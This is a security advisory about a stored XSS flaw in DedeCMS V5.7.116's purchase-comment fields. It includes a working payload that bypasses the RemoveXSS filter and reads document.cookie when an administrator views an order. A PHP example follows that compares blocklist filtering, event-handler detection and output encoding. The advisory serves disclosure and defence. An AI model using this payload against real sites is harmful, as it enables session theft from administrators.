Summary
A stored XSS vulnerability has been identified in DedeCMS V5.7.116.
Attackers can exploit this vulnerability by inserting an XSS payload into the comment field while purchasing goods.
Details
The vulnerability is located in the file plus/carbuyaction.php. Our analysis indicates that all parameters are passed through the RemoveXSS method.
However, our payload bypasses the filtering performed by RemoveXSS, so any script that relies solely on RemoveXSS to filter parameter values and then displays those values on a page is vulnerable.
Steps
The attacker, posing as a regular user, purchases goods and adds a malicious comment.
An administrator opens the order details in the backend, triggering the stored XSS vulnerability.
POC
Parameters that are vulnerable: des, postname, email, address.
It is worth noting that some parameters may have maximum length restrictions.
We provide a proof of concept that bypasses the RemoveXSS method:
<body onpointermove="alert(document.cookie)">
The payload can also be modified to load an external JavaScript file.
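As an added illustration (not DedeCMS code and not the real RemoveXSS implementation), the PHP below runs the payload above through a constructed blocklist-style filter, a handler-agnostic detection check, and contextual output encoding, to show why a fixed list of event-handler names is not a defence; the function names `blocklist_filter`, `has_event_handler` and `render_text` are assumptions.

```php
<?php
// Added illustration: blocklist filtering vs. detection vs. output encoding.
// None of this is DedeCMS code; blocklist_filter() only imitates the shape of
// classic name-list XSS filters and is deliberately incomplete.

// Constructed blocklist filter: neutralises a fixed set of handler names by
// breaking the attribute name, and leaves everything else untouched.
function blocklist_filter(string $s): string {
    $handlers = ['onclick', 'onmouseover', 'onload', 'onerror', 'onfocus'];
    foreach ($handlers as $h) {
        $broken = substr($h, 0, 2) . '<x>' . substr($h, 2);
        $s = preg_replace('/' . $h . '/i', $broken, $s);
    }
    return $s;
}

// Detection that does not depend on knowing the handler name: any
// on<letters>= attribute inside a tag is flagged, so new DOM events such as
// onpointermove are caught as well as the classic ones.
function has_event_handler(string $s): bool {
    return (bool) preg_match('/<[^>]*\bon[a-z]+\s*=/i', $s);
}

// Mitigation: encode for the HTML text context at output time instead of
// trying to recognise bad input. <, >, " and ' become entities, so the
// browser never sees a tag or an attribute.
function render_text(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed input: the proof-of-concept string from the report above.
$comment = '<body onpointermove="alert(document.cookie)">';

// The handler name is not in the list, so the filter returns it unchanged;
// the generic check still flags it; the encoded form is inert when rendered.
echo "filtered : ", blocklist_filter($comment), PHP_EOL;
echo "flagged  : ", has_event_handler($comment) ? 'yes' : 'no', PHP_EOL;
echo "encoded  : ", render_text($comment), PHP_EOL;
```

The encoded form is what the backend order-details page should emit for these fields; the detection regex is suitable for logging or alerting on stored comments, not as a replacement for encoding.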